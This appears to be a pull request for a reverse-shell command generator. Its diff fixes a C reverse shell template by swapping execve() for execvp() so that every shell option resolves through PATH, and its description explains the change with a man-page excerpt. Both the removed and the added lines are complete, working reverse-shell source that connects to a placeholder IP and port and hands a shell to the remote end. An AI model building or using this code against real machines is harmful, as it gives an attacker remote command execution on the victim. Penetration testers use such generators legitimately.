### PR TITLE
Fix C shell

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -98,7 +98,7 @@ const reverseShellCommands = withCommandType(
         },
         {
             "name": "C",
-            "command": "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n    int port = {port};\n    struct sockaddr_in revsockaddr;\n\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\n    revsockaddr.sin_family = AF_INET;       \n    revsockaddr.sin_port = htons(port);\n    revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n    connect(sockt, (struct sockaddr *) &revsockaddr, \n    sizeof(revsockaddr));\n    dup2(sockt, 0);\n    dup2(sockt, 1);\n    dup2(sockt, 2);\n\n    char * const argv[] = {\"{shell}\", NULL};\n    execve(\"{shell}\", argv, NULL);\n\n    return 0;       \n}",
+            "command": "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n    int port = {port};\n    struct sockaddr_in revsockaddr;\n\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\n    revsockaddr.sin_family = AF_INET;       \n    revsockaddr.sin_port = htons(port);\n    revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n    connect(sockt, (struct sockaddr *) &revsockaddr, \n    sizeof(revsockaddr));\n    dup2(sockt, 0);\n    dup2(sockt, 1);\n    dup2(sockt, 2);\n\n    char * const argv[] = {\"{shell}\", NULL};\n    execvp(\"{shell}\", argv);\n\n    return 0;       \n}",
             "meta": ["linux", "mac"]
         },
                 {


### PR DESCRIPTION
This PR changes the `execve()` function in the C reverse shell with the `execvp()` function.

`execve()` do no search the PATH for the given command. So unless you select `/bin/bash` or `/bin/sh` option from the shell select menu, C reverse shell does not function.

`execvp()` searches the PATH for the given command **unless** it contains a `/`, so all the shell options work with `execvp()`. [See the man page for details](https://www.man7.org/linux/man-pages/man3/exec.3.html):
>  p - execlp(), execvp(), execvpe()
>> These functions duplicate the actions of the shell in searching 
>> for an executable file if the specified filename does not contain
>> a slash (/) character.  The file is sought in the colon-separated 
>> list of directory pathnames specified in the PATH environment
>> variable.  If this variable isn't defined, the path list defaults to a 
>> list that includes the directories returned by confstr(_CS_PATH) 
>> (which typically returns the value "/bin:/usr/bin") and possibly 
>> also the current working directory